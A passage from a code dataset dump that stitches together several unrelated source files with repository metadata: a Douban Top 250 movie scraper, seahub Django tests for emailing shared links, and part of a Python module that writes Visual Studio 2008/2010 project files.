# "metabase_ngse.tasks.all"
# ],
# "daily": [
# "metabase_ngse.tasks.daily"
# ],
# "hourly": [
# "metabase_ngse.tasks.hourly"
# ],
# "weekly": [
# "metabase_ngse.tasks.weekly"
# ]
# "monthly": [
# "metabase_ngse.tasks.monthly"
# ]
# }
# Testing
# -------
# before_tests = "metabase_ngse.install.before_tests"
# Overriding Methods
# ------------------------------
#
# override_whitelisted_methods = {
# "frappe.desk.doctype.event.event.get_events": "metabase_ngse.event.get_events"
# }
#
# each overriding function accepts a `data` argument;
# generated from the base implementation of the doctype dashboard,
# along with any modifications made in other Frappe apps
# override_doctype_dashboards = {
# "Task": "metabase_ngse.task.get_dashboard_data"
# }
|
[
"[email protected]"
] | |
209cf4447eef471a6961ceff4174497f1acc3937
|
caa947ea6cbbb44c80f01702a4076708451eaa73
|
/splider_for_douban.py
|
3c00e458a309669504c1bf16436621e9837d16df
|
[] |
no_license
|
lugq1990/chatbot_douban
|
e2696aa56657fda3d4afdc6775390db691df3e9b
|
f7d746dfcdd5ea853e99ad96c7dfe7cebc4b31e8
|
refs/heads/main
| 2023-08-27T01:36:55.246079 | 2021-10-25T07:21:17 | 2021-10-25T07:21:17 | 418,353,579 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,285 |
py
|
import re
from bs4 import BeautifulSoup
import requests
import time
import os
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
import json
class DoubanSplider:
def __init__(self) -> None:
self.base_top_url = "https://movie.douban.com/top250?start={}&filter="
self.headers = {'User-Agent': 'Mozilla/5.0'}
self.driver = webdriver.Chrome(ChromeDriverManager().install())
def get_response(self, url):
response = requests.get(url, headers=self.headers)
if response.status_code != 200:
print("Get some error from request! As error code is {}".format(response.status_code))
bs = BeautifulSoup(response.content, 'html.parser')
time.sleep(.2)
return bs
def get_response_with_driver(self, url):
self.driver.get(url)
bs = BeautifulSoup(self.driver.page_source, 'html.parser')
time.sleep(.1)
return bs
def get_top250_links(self):
each_page = 25
full_n = 250
res_tuple = []
for i in range(int(full_n/each_page)):
print("Now if page: {}".format(i))
bs = self.get_response_with_driver(self.base_top_url.format(i * each_page))
# find each page items
items = bs.find_all('div', class_='item')
for item in items:
each_item_info = self._get_top_content(item)
res_tuple.append(each_item_info)
return res_tuple
@staticmethod
def save_list_into_file(obj_list, file_name, file_path=None):
if not file_path:
file_path = 'tmp_data'
if file_name.find('.') == -1:
file_name += '.txt'
with open(os.path.join(file_path, file_name), 'w', encoding='utf-8') as f:
for obj in obj_list:
if isinstance(obj, list) or isinstance(obj, tuple):
f.write(','.join(obj) + '\n')
else:
f.write(obj + '\n')
@staticmethod
def _get_top_content(item):
title = item.find(class_='hd').find(class_='title').get_text()
url = item.find(class_='hd').find('a').get('href')
score = item.find_all("span", class_='rating_num')[0].get_text()
n_users = item.find_all("span")[-2].get_text()
return (title, score, n_users, url)
def get_movie_base_info(self):
"""
get_movie_base_info Just to use a open source link to get sample data based on movie ID.
"""
base_api_url = "https://movie.querydata.org/api?id={}"
# get full ids with movie name
with open(os.path.join('tmp_data', 'top250_link.txt'), 'r', encoding='utf-8') as f:
data_line = f.readlines()
movie_info_dict = {}
for data in data_line:
id = data.split(',')[-1].split("/")[-2]
movie_name = data.split(',')[0]
response = requests.get(base_api_url.format(id)).text
movie_info_dict[movie_name] = response
return movie_info_dict
if __name__ == '__main__':
splider = DoubanSplider()
res_link = splider.get_top250_links()
splider.save_list_into_file(res_link, 'top250_link.txt')
|
[
"[email protected]"
] | |
01ed2276aaa8ccf051e68654900f77f99150ae15
|
4de03eecadc4c69caf792f4773571c2f6dbe9d68
|
/tests/seahub/share/views/test_send_shared_link.py
|
c265c943065929d26d603cb4f387bfa7dd71b7aa
|
[
"Apache-2.0"
] |
permissive
|
Tr-1234/seahub
|
c1663dfd12f7584f24c160bcf2a83afdbe63a9e2
|
ed255e0566de054b5570218cb39cc320e99ffa44
|
refs/heads/master
| 2022-12-23T16:20:13.138757 | 2020-10-01T04:13:42 | 2020-10-01T04:13:42 | 300,138,290 | 0 | 0 |
Apache-2.0
| 2020-10-01T04:11:41 | 2020-10-01T04:11:40 | null |
UTF-8
|
Python
| false | false | 3,204 |
py
|
from mock import patch
from django.core import mail
from django.core.urlresolvers import reverse
from django.test import override_settings
from seahub.profile.models import Profile
from seahub.profile.utils import refresh_cache
from seahub.test_utils import BaseTestCase
class SendSharedLinkTest(BaseTestCase):
def setUp(self):
mail.outbox = []
@override_settings(DEFAULT_FROM_EMAIL='[email protected]')
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
def test_can_send(self):
self.login_as(self.user)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == '[email protected]'
@patch('seahub.share.views.REPLACE_FROM_EMAIL', True)
@patch('seahub.share.views.ADD_REPLY_TO_HEADER', True)
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
@patch('seahub.utils.IS_EMAIL_CONFIGURED', True)
def test_can_send_from_replyto_rewrite(self):
self.login_as(self.user)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == self.user.email
assert mail.outbox[0].extra_headers['Reply-to'] == self.user.email
@patch('seahub.share.views.REPLACE_FROM_EMAIL', True)
@patch('seahub.share.views.ADD_REPLY_TO_HEADER', True)
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
@patch('seahub.utils.IS_EMAIL_CONFIGURED', True)
def test_can_send_from_replyto_rewrite_contact_email(self):
self.login_as(self.user)
nickname = 'Testuser'
contact_email= '[email protected]'
p = Profile.objects.add_or_update(self.user.email, nickname=nickname)
p.contact_email = contact_email
p.save()
refresh_cache(self.user.email)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == contact_email
assert mail.outbox[0].extra_headers['Reply-to'] == contact_email
|
[
"[email protected]"
] | |
9d55ea5cb4addbc1cc6d2fe4e49086c6505e4551
|
a75f9cf4f03b01f8e7cc12d311434beca1b233e5
|
/vstools/writers.py
|
fbfa81a2230924a07bc92e36d66720df61542f97
|
[
"Apache-2.0"
] |
permissive
|
libyal/vstools
|
3169dbf62be79eb309f9d23a06e068cb3bd1ed81
|
f251133b39131735576baad2077bc47821e9b99b
|
refs/heads/main
| 2023-04-13T06:54:29.549207 | 2023-04-10T10:41:06 | 2023-04-10T10:41:06 | 95,857,124 | 4 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 75,608 |
py
|
# -*- coding: utf-8 -*-
"""Project and solution file writer classes."""
import abc
import re
from vstools import definitions
class FileWriter(object):
"""File writer."""
def __init__(self, encoding='utf-8', end_of_line='\r\n'):
"""Initializes a file writer.
Args:
encoding (str): encoding.
end_of_line (str): end of line.
"""
super(FileWriter, self).__init__()
self._encoding = encoding
self._end_of_line = end_of_line
self._file = None
def Close(self):
"""Closes the project file."""
self._file.close()
def Open(self, filename):
"""Opens the project file.
Args:
filename (str): path of the file.
"""
# Using binary mode to make sure to write Windows/DOS end of lines.
self._file = open(filename, 'wb') # pylint: disable=consider-using-with
def WriteBinaryData(self, data):
"""Writes binary data.
Args:
data (bytes): binary data.
"""
self._file.write(data)
def WriteLine(self, line):
"""Writes a line."""
line = ''.join([line, self._end_of_line])
line = line.encode(self._encoding)
self.WriteBinaryData(line)
def WriteLines(self, lines):
"""Writes lines."""
for line in lines:
self.WriteLine(line)
class VSProjectFileWriter(FileWriter):
"""Visual Studio project file writer."""
def __init__(self, encoding='utf-8', end_of_line='\r\n'):
"""Initializes a Visual Studio project file writer.
Args:
encoding (str): encoding.
end_of_line (str): end of line.
"""
super(VSProjectFileWriter, self).__init__(
encoding=encoding, end_of_line=end_of_line)
@abc.abstractmethod
def WriteFooter(self):
"""Writes a file footer."""
@abc.abstractmethod
def WriteHeader(self):
"""Writes a file header."""
class VS2008ProjectFileWriter(VSProjectFileWriter):
"""Visual Studio 2008 project file writer."""
_CONFIGURATION_OPTIONS = [
('ConfigurationType', 'output_type', False),
('CharacterSet', 'character_set', False),
('ManagedExtensions', 'managed_extensions', True),
('WholeProgramOptimization', 'whole_program_optimization', True),
]
_TOOL_COMPILER_CONFIGURATION_OPTIONS = [
('Optimization', 'optimization', True),
('AdditionalIncludeDirectories', 'include_directories', False),
('PreprocessorDefinitions', 'preprocessor_definitions', False),
('BasicRuntimeChecks', 'basic_runtime_checks', True),
('SmallerTypeCheck', 'smaller_type_check', True),
('RuntimeLibrary', 'runtime_library', False),
('UsePrecompiledHeader', 'precompiled_header', True),
('WarningLevel', 'warning_level', False),
('WarnAsError', 'warning_as_error', True),
('Detect64BitPortabilityProblems',
'detect_64bit_portability_problems', True),
('DebugInformationFormat', 'debug_information_format', True),
('CompileAs', 'compile_as', False),
]
_TOOL_LIBRARIAN_CONFIGURATION_OPTIONS = [
('OutputFile', 'librarian_output_file', False),
('ModuleDefinitionFile', 'librarian_module_definition_file', False),
('IgnoreAllDefaultLibraries', 'librarian_ignore_defaults', False),
]
_TOOL_LINKER_CONFIGURATION_OPTIONS1 = [
# ('AdditionalDependencies', 'additional_dependencies', True),
('OutputFile', 'linker_output_file', True),
('LinkIncremental', 'link_incremental', True),
]
_TOOL_LINKER_CONFIGURATION_OPTIONS2 = [
# ('AdditionalLibraryDirectories', 'library_directories', False),
('GenerateDebugInformation', 'generate_debug_information', True),
('SubSystem', 'sub_system', True),
('OptimizeReferences', 'optimize_references', True),
('EnableCOMDATFolding', 'enable_comdat_folding', True),
('RandomizedBaseAddress', 'randomized_base_address', True),
('DataExecutionPrevention', 'data_execution_prevention', True),
('TargetMachine', 'target_machine', True),
('ImportLibrary', 'import_library', True),
]
def __init__(self):
"""Initializes a Visual Studio project file writer."""
super(VS2008ProjectFileWriter, self).__init__()
self._version = 2008
def _WriteConfiguration(self, project_configuration):
"""Writes the project configuration.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self.WriteLine('\t\t<Configuration')
self.WriteLine('\t\t\tName="{0:s}|{1:s}"'.format(
project_configuration.name, project_configuration.platform))
self.WriteLines([
'\t\t\tOutputDirectory="$(SolutionDir)$(ConfigurationName)"',
'\t\t\tIntermediateDirectory="$(ConfigurationName)"'])
for definition, name, is_optional in self._CONFIGURATION_OPTIONS:
self._WriteConfigurationOption(
project_configuration, definition, name, is_optional, 3)
self.WriteLine('\t\t\t>')
tools = [
('VCPreBuildEventTool', []),
('VCCustomBuildTool', []),
('VCXMLDataGeneratorTool', []),
('VCWebServiceProxyGeneratorTool', []),
('VCMIDLTool', []),
('VCCLCompilerTool', self._TOOL_COMPILER_CONFIGURATION_OPTIONS),
('VCManagedResourceCompilerTool', []),
('VCResourceCompilerTool', []),
('VCPreLinkEventTool', []),
]
# TODO: add "librarian values set" to project configuration?
if project_configuration.librarian_output_file:
tool = ('VCLibrarianTool', self._TOOL_LIBRARIAN_CONFIGURATION_OPTIONS)
tools.append(tool)
for name, configuration_options in tools:
self._WriteConfigurationTool(
project_configuration, name, configuration_options)
if project_configuration.linker_values_set:
self._WriteConfigurationLinkerTool(project_configuration)
tools = [('VCALinkTool', [])]
if project_configuration.linker_values_set:
tools.append(('VCManifestTool', []))
tools.extend([
('VCXDCMakeTool', []),
('VCBscMakeTool', []),
('VCFxCopTool', [])
])
if project_configuration.linker_values_set:
tools.append(('VCAppVerifierTool', []))
tools.append(('VCPostBuildEventTool', []))
for name, configuration_options in tools:
self._WriteConfigurationTool(
project_configuration, name, configuration_options)
self.WriteLine('\t\t</Configuration>')
def _WriteConfigurationLinkerTool(self, project_configuration):
"""Writes the project configuration linker tool.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self._WriteConfigurationToolHeader('VCLinkerTool')
if project_configuration.additional_dependencies:
self.WriteLine('\t\t\t\tAdditionalDependencies="{0:s}"'.format(
' '.join(sorted(project_configuration.additional_dependencies))))
for definition, name, is_optional in (
self._TOOL_LINKER_CONFIGURATION_OPTIONS1):
self._WriteConfigurationOption(
project_configuration, definition, name, is_optional, 4)
library_directories = ['"$(OutDir)"']
library_directories.extend(project_configuration.library_directories)
library_directories = ';'.join(library_directories)
self.WriteLine('\t\t\t\tAdditionalLibraryDirectories="{0:s}"'.format(
library_directories))
for definition, name, is_optional in (
self._TOOL_LINKER_CONFIGURATION_OPTIONS2):
self._WriteConfigurationOption(
project_configuration, definition, name, is_optional, 4)
self._WriteConfigurationToolFooter()
def _WriteConfigurationOption(
self, project_configuration, definition, name, is_optional,
indentation_level):
"""Parses a configuration option.
An optional configuration option will not be written when its configuration
value is not set.
Args:
project_configuration (VSProjectConfiguration): project configuration.
definition (str): definition of the configuration value in file.
name (str): name of the configuration value in the project information.
is_optional (bool): True if the configuration option is optional.
indentation_level (int): indentation level.
"""
configuration_value = getattr(project_configuration, name, '')
if name == 'include_directories':
configuration_value = ';'.join(configuration_value)
if not is_optional or configuration_value:
indentation = '\t' * indentation_level
line = '{0:s}{1:s}="{2:s}"'.format(
indentation, definition, configuration_value)
self.WriteLine(line)
def _WriteConfigurationTool(
self, project_configuration, name, configuration_options):
"""Writes a project configuration tool.
Args:
project_configuration (VSProjectConfiguration): project configuration.
name (str): name of the tool.
configuration_options (list[tuple[str, str, bool]]): configuration
options defined as a tuple of definition, name and is optional.
"""
self._WriteConfigurationToolHeader(name)
# pylint: disable=redefined-argument-from-local
for definition, name, is_optional in configuration_options:
self._WriteConfigurationOption(
project_configuration, definition, name, is_optional, 4)
self._WriteConfigurationToolFooter()
def _WriteConfigurationToolFooter(self):
"""Writes the project configuration tool footer."""
self.WriteLine('\t\t\t/>')
def _WriteConfigurationToolHeader(self, name):
"""Writes the project configuration tool header.
Args:
name (str): name of the tool.
"""
self.WriteLines([
'\t\t\t<Tool',
'\t\t\t\tName="{0:s}"'.format(name)])
def _WriteHeaderFiles(self, header_files):
"""Writes the header files.
Args:
header_files (list[str]): header filenames.
"""
self.WriteLines([
'\t\t<Filter',
'\t\t\tName="Header Files"',
'\t\t\tFilter="h;hpp;hxx;hm;inl;inc;xsd"',
'\t\t\tUniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"',
'\t\t\t>'])
for filename in header_files:
self.WriteLine('\t\t\t<File')
self.WriteLine('\t\t\t\tRelativePath="{0:s}"'.format(filename))
self.WriteLines([
'\t\t\t\t>',
'\t\t\t</File>'])
self.WriteLine('\t\t</Filter>')
def _WriteResourceFiles(self, resource_files):
"""Writes the resource files.
Args:
resource_files (list[str]): resource filenames.
"""
self.WriteLines([
'\t\t<Filter',
'\t\t\tName="Resource Files"',
('\t\t\tFilter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;'
'resx;tiff;tif;png;wav"'),
'\t\t\tUniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"',
'\t\t\t>'])
for filename in resource_files:
self.WriteLine('\t\t\t<File')
self.WriteLine('\t\t\t\tRelativePath="{0:s}"'.format(filename))
self.WriteLines([
'\t\t\t\t>',
'\t\t\t</File>'])
self.WriteLine('\t\t</Filter>')
def _WriteSourceFiles(self, source_files):
"""Writes the source files.
Args:
source_files (list[str]): source filenames.
"""
self.WriteLines([
'\t\t<Filter',
'\t\t\tName="Source Files"',
'\t\t\tFilter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"',
'\t\t\tUniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"',
'\t\t\t>'])
for filename in source_files:
self.WriteLine('\t\t\t<File')
self.WriteLine('\t\t\t\tRelativePath="{0:s}"'.format(filename))
self.WriteLines([
'\t\t\t\t>',
'\t\t\t</File>'])
self.WriteLine('\t\t</Filter>')
def WriteConfigurations(self, project_configurations):
"""Writes the configurations.
Args:
project_configurations (VSConfigurations): configurations.
"""
self.WriteLine('\t<Configurations>')
for project_configuration in project_configurations.GetSorted():
self._WriteConfiguration(project_configuration)
self.WriteLine('\t</Configurations>')
self.WriteLines([
'\t<References>',
'\t</References>'])
# pylint: disable=unused-argument
def WriteDependencies(self, dependencies, solution_projects_by_guid):
"""Writes the dependencies.
Args:
dependencies (list[str]): GUIDs of the dependencies.
solution_projects_by_guid (dict[str, VSSolutionProject]): projects
per lower case GUID.
"""
return
def WriteFiles(self, source_files, header_files, resource_files):
"""Writes the files.
Args:
source_files (list[str]): source filenames.
header_files (list[str]): header filenames.
resource_files (list[str]): resource filenames.
"""
self.WriteLine('\t<Files>')
self._WriteSourceFiles(source_files)
self._WriteHeaderFiles(header_files)
self._WriteResourceFiles(resource_files)
self.WriteLine('\t</Files>')
self.WriteLines([
'\t<Globals>',
'\t</Globals>'])
def WriteFooter(self):
"""Writes a file footer."""
self.WriteLine('</VisualStudioProject>')
def WriteHeader(self):
"""Writes a file header."""
self.WriteLine('<?xml version="1.0" encoding="Windows-1252"?>')
# pylint: disable=unused-argument
def WriteProjectConfigurations(self, project_configurations):
"""Writes the project configurations.
Args:
project_configurations (VSConfigurations): configurations.
"""
return
def WriteProjectInformation(self, project_information):
"""Writes the project information.
Args:
project_information (VSProjectInformation): project information.
"""
self.WriteLines([
'<VisualStudioProject',
'\tProjectType="Visual C++"',
'\tVersion="9,00"'])
self.WriteLine('\tName="{0:s}"'.format(project_information.name))
self.WriteLine('\tProjectGUID="{{{0:s}}}"'.format(
project_information.guid.upper()))
self.WriteLine(
'\tRootNamespace="{0:s}"'.format(project_information.root_name_space))
if project_information.keyword:
self.WriteLine(
'\tKeyword="{0:s}"'.format(project_information.keyword))
# Also seen 196613.
self.WriteLines([
'\tTargetFrameworkVersion="131072"',
'\t>'])
# TODO: handle platforms.
self.WriteLines([
'\t<Platforms>',
'\t\t<Platform',
'\t\t\tName="Win32"',
'\t\t/>',
'\t</Platforms>'])
self.WriteLines([
'\t<ToolFiles>',
'\t</ToolFiles>'])
class VS2010ProjectFileWriter(VSProjectFileWriter):
"""Visual Studio 2010 project file writer."""
def __init__(self):
"""Initializes a Visual Studio project file writer."""
super(VS2010ProjectFileWriter, self).__init__()
self._project_file_version = '10.0.40219.1'
self._tools_version = '4.0'
self._version = 2010
def _WriteClCompileSection(self, project_configuration):
"""Writes the CLCompile section.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
include_directories = ';'.join(project_configuration.include_directories)
include_directories = re.sub(r'"', r'', include_directories)
if include_directories and include_directories[-1] != ';':
include_directories = '{0:s};'.format(
include_directories)
include_directories = '{0:s}%(AdditionalIncludeDirectories)'.format(
include_directories)
preprocessor_definitions = project_configuration.preprocessor_definitions
if preprocessor_definitions and preprocessor_definitions[-1] != ';':
preprocessor_definitions = '{0:s};'.format(preprocessor_definitions)
preprocessor_definitions = '{0:s}%(PreprocessorDefinitions)'.format(
preprocessor_definitions)
self.WriteLine(' <ClCompile>')
if project_configuration.optimization != '':
self.WriteLine(' <Optimization>{0:s}</Optimization>'.format(
project_configuration.optimization_string))
if project_configuration.enable_intrinsic_functions != '':
self.WriteLine((
' <IntrinsicFunctions>{0:s}</IntrinsicFunctions>').format(
project_configuration.enable_intrinsic_functions))
if project_configuration.whole_program_optimization:
self.WriteLine((
' <WholeProgramOptimization>{0:s}'
'</WholeProgramOptimization>').format(
project_configuration.whole_program_optimization_string))
self.WriteLine((
' <AdditionalIncludeDirectories>{0:s}'
'</AdditionalIncludeDirectories>').format(include_directories))
self.WriteLine((
' <PreprocessorDefinitions>{0:s}'
'</PreprocessorDefinitions>').format(preprocessor_definitions))
if project_configuration.basic_runtime_checks != '':
self.WriteLine((
' <BasicRuntimeChecks>{0:s}'
'</BasicRuntimeChecks>').format(
project_configuration.basic_runtime_checks_string))
if project_configuration.smaller_type_check != '':
self.WriteLine((
' <SmallerTypeCheck>{0:s}</SmallerTypeCheck>').format(
project_configuration.smaller_type_check))
self.WriteLine((
' <RuntimeLibrary>{0:s}</RuntimeLibrary>').format(
project_configuration.runtime_librarian_string))
if project_configuration.enable_function_level_linking != '':
self.WriteLine((
' <FunctionLevelLinking>{0:s}</FunctionLevelLinking>').format(
project_configuration.enable_function_level_linking))
if project_configuration.precompiled_header != '':
# A value of 0 is represented by a new line.
if project_configuration.precompiled_header == '0':
self.WriteLines([
' <PrecompiledHeader>',
' </PrecompiledHeader>'])
else:
self.WriteLine((
' <PrecompiledHeader>{0:s}</PrecompiledHeader>').format(
project_configuration.precompiled_header_string))
self.WriteLine(' <WarningLevel>{0:s}</WarningLevel>'.format(
project_configuration.warning_level_string))
if project_configuration.warning_as_error:
self.WriteLine((
' <TreatWarningAsError>{0:s}'
'</TreatWarningAsError>').format(
project_configuration.warning_as_error))
if project_configuration.debug_information_format != '':
# A value of 0 is represented by a new line.
if project_configuration.debug_information_format == '0':
self.WriteLines([
' <DebugInformationFormat>',
' </DebugInformationFormat>'])
else:
self.WriteLine((
' <DebugInformationFormat>{0:s}'
'</DebugInformationFormat>').format(
project_configuration.debug_information_format_string))
if project_configuration.compile_as:
self.WriteLine(' <CompileAs>{0:s}</CompileAs>'.format(
project_configuration.compile_as_string))
self.WriteLine(' </ClCompile>')
def _WriteConfigurationPropertyGroup(self, project_configuration):
"""Writes the configuration property group.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self._WriteConfigurationPropertyGroupHeader(project_configuration)
self.WriteLine(' <ConfigurationType>{0:s}</ConfigurationType>'.format(
project_configuration.output_type_string))
if project_configuration.character_set:
self.WriteLine(' <CharacterSet>{0:s}</CharacterSet>'.format(
project_configuration.character_set_string))
if project_configuration.managed_extensions == '1':
self.WriteLine(' <CLRSupport>true</CLRSupport>')
if project_configuration.whole_program_optimization:
self.WriteLine((
' <WholeProgramOptimization>{0:s}'
'</WholeProgramOptimization>').format(
project_configuration.whole_program_optimization_string))
platform_toolset = project_configuration.GetPlatformToolset(self._version)
if platform_toolset:
self.WriteLine(' <PlatformToolset>{0:s}</PlatformToolset>'.format(
platform_toolset))
self._WriteConfigurationPropertyGroupFooter()
def _WriteConfigurationPropertyGroupFooter(self):
"""Writes the configuration property group footer."""
self.WriteLine(' </PropertyGroup>')
def _WriteConfigurationPropertyGroupHeader(self, project_configuration):
"""Writes the configuration property group header.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self.WriteLine((
' <PropertyGroup Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'" Label="Configuration">').format(
project_configuration.name, project_configuration.platform))
def _WriteHeaderFiles(self, header_files):
"""Writes the header files.
Args:
header_files (list[str]): header filenames.
"""
if header_files:
self.WriteLine(' <ItemGroup>')
for filename in header_files:
self.WriteLine(' <ClInclude Include="{0:s}" />'.format(filename))
self.WriteLine(' </ItemGroup>')
def _WriteItemDefinitionGroup(self, project_configuration):
"""Writes the item definition group.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self._WriteItemDefinitionGroupHeader(project_configuration)
# Write the compiler specific section.
self._WriteClCompileSection(project_configuration)
# Write the librarian specific section.
if project_configuration.librarian_output_file:
self._WriteLibrarianSection(project_configuration)
# Write the linker specific section.
if (project_configuration.linker_values_set or
project_configuration.output_type == (
definitions.OUTPUT_TYPE_APPLICATION)):
self._WriteLinkerSection(project_configuration)
self._WriteItemDefinitionGroupFooter()
def _WriteItemDefinitionGroupFooter(self):
"""Writes the item definition group header."""
self.WriteLine(' </ItemDefinitionGroup>')
def _WriteItemDefinitionGroupHeader(self, project_configuration):
"""Writes the item definition group header.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self.WriteLine((
' <ItemDefinitionGroup Condition="\'$(Configuration)|'
'$(Platform)\'==\'{0:s}|{1:s}\'">').format(
project_configuration.name, project_configuration.platform))
def _WriteLibrarianSection(self, project_configuration):
"""Writes the librarian section.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
librarian_output_file = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)',
project_configuration.librarian_output_file)
self.WriteLines([
' <Lib>',
' <OutputFile>{0:s}</OutputFile>'.format(librarian_output_file)])
if project_configuration.module_definition_file != '':
self.WriteLine((
' <ModuleDefinitionFile>{0:s}'
'</ModuleDefinitionFile>').format(
project_configuration.module_definition_file))
else:
self.WriteLines([
' <ModuleDefinitionFile>',
' </ModuleDefinitionFile>'])
if project_configuration.librarian_ignore_defaults != '':
self.WriteLine((
' <IgnoreAllDefaultLibraries>{0:s}'
'</IgnoreAllDefaultLibraries>').format(
project_configuration.librarian_ignore_defaults))
self.WriteLine(' </Lib>')
def _WriteLinkerSection(self, project_configuration):
"""Writes the linker section.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self.WriteLine(' <Link>')
# Visual Studio will convert an empty additional dependencies value.
if project_configuration.additional_dependencies:
additional_dependencies = ';'.join(
sorted(project_configuration.additional_dependencies))
additional_dependencies = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)', additional_dependencies)
if additional_dependencies and additional_dependencies[-1] != ';':
additional_dependencies = '{0:s};'.format(additional_dependencies)
additional_dependencies = '{0:s}%(AdditionalDependencies)'.format(
additional_dependencies)
self.WriteLine((
' <AdditionalDependencies>{0:s}'
'</AdditionalDependencies>').format(
additional_dependencies))
if project_configuration.linker_output_file:
linker_output_file = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)',
project_configuration.linker_output_file)
self.WriteLine(' <OutputFile>{0:s}</OutputFile>'.format(
linker_output_file))
if project_configuration.module_definition_file != '':
self.WriteLine((
' <ModuleDefinitionFile>{0:s}'
'</ModuleDefinitionFile>').format(
project_configuration.module_definition_file))
if project_configuration.library_directories:
library_directories = ';'.join(project_configuration.library_directories)
library_directories = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)', library_directories)
library_directories = re.sub(r'"', r'', library_directories)
if library_directories and library_directories[-1] != ';':
library_directories = '{0:s};'.format(library_directories)
library_directories = '{0:s}%(AdditionalLibraryDirectories)'.format(
library_directories)
self.WriteLine((
' <AdditionalLibraryDirectories>{0:s}'
'</AdditionalLibraryDirectories>').format(
library_directories))
if project_configuration.generate_debug_information != '':
self.WriteLine((
' <GenerateDebugInformation>{0:s}'
'</GenerateDebugInformation>').format(
project_configuration.generate_debug_information))
if project_configuration.sub_system != '':
self.WriteLine(' <SubSystem>{0:s}</SubSystem>'.format(
project_configuration.sub_system_string))
if project_configuration.optimize_references == '0':
self.WriteLines([
' <OptimizeReferences>',
' </OptimizeReferences>'])
elif project_configuration.optimize_references != '':
self.WriteLine((
' <OptimizeReferences>{0:s}</OptimizeReferences>').format(
project_configuration.optimize_references_string))
if project_configuration.enable_comdat_folding == '0':
self.WriteLines([
' <EnableCOMDATFolding>',
' </EnableCOMDATFolding>'])
elif project_configuration.enable_comdat_folding != '':
self.WriteLine((
' <EnableCOMDATFolding>{0:s}</EnableCOMDATFolding>').format(
project_configuration.enable_comdat_folding_string))
if project_configuration.randomized_base_address != '':
self.WriteLine((
' <RandomizedBaseAddress>{0:s}'
'</RandomizedBaseAddress>').format(
project_configuration.randomized_base_address_string))
if project_configuration.fixed_base_address == '0':
self.WriteLines([
' <FixedBaseAddress>',
' </FixedBaseAddress>'])
if project_configuration.data_execution_prevention != '':
# A value of 0 is represented by a new line.
if project_configuration.data_execution_prevention == '0':
self.WriteLines([
' <DataExecutionPrevention>',
' </DataExecutionPrevention>'])
else:
self.WriteLine((
' <DataExecutionPrevention>{0:s}'
'</DataExecutionPrevention>').format(
project_configuration.data_execution_prevention_string))
if project_configuration.import_library:
import_library = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)',
project_configuration.import_library)
self.WriteLine(' <ImportLibrary>{0:s}</ImportLibrary>'.format(
import_library))
if project_configuration.target_machine != '':
self.WriteLine(' <TargetMachine>{0:s}</TargetMachine>'.format(
project_configuration.target_machine_string))
self.WriteLine(' </Link>')
def _WriteOutIntDirConditions(
self, configuration_name, project_configurations):
"""Writes the OutDir and IntDir conditions.
Args:
configuration_name (str): name of the configuration.
project_configurations (VSConfigurations): configurations.
"""
for configuration_platform in sorted(project_configurations.platforms):
project_configuration = project_configurations.GetByIdentifier(
configuration_name, configuration_platform)
if len(project_configurations.platforms) == 1:
self.WriteLine((
' <OutDir Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">$(SolutionDir)$(Configuration)\\'
'</OutDir>').format(
project_configuration.name, project_configuration.platform))
else:
self.WriteLine((
' <OutDir Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">$(SolutionDir)$(Configuration)\\$(Platform)\\'
'</OutDir>').format(
project_configuration.name, project_configuration.platform))
for configuration_platform in sorted(project_configurations.platforms):
project_configuration = project_configurations.GetByIdentifier(
configuration_name, configuration_platform)
if len(project_configurations.platforms) == 1:
self.WriteLine((
' <IntDir Condition="\'$(Configuration)|$(Platform)\'=='
